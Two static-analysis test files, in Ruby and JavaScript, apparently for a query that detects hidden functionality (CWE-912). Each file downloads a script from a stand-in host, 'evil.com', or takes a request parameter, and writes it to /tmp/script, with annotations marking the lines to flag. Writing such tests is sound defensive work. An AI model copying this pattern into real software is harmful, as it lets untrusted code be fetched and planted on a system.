File: ruby/ql/test/query-tests/security/cwe-912/http_to_file_access.rb
require "net/http"

resp = Net::HTTP.new("evil.com").get("/script").body # $ Source
file = File.open("/tmp/script", "w")
file.write(resp) # $ Alert // BAD

class ExampleController < ActionController::Base
    def example
      script = params[:script] # $ Source
      file = File.open("/tmp/script", "w")
      file.write(script) # $ Alert // BAD
    end

    def example2
      a = "a"
      file = File.open("/tmp/script", "w")
      file.write(a) # GOOD
    end
end

File: javascript/ql/test/query-tests/Security/CWE-912/HttpToFileAccess.js
var https = require("https");
var fs = require("fs");

https.get('https://evil.com/script', res => {
  res.on("data", d => { // $ Source
    fs.writeFileSync("/tmp/script", d) // $ Alert
  });
});


https.get('https://evil.com/script', res => {
  res.on("data", d => { // $ Source
    fs.open("/tmp/script", 'r', (err, fd) => {
      fs.writev(fd, [d], (err, bytesWritten) => { // $ Alert
        console.log(`Wrote ${bytesWritten} bytes`);
      });

      const bytesWritten = fs.writevSync(fd, [d]); // $ Alert
    });
  });
});
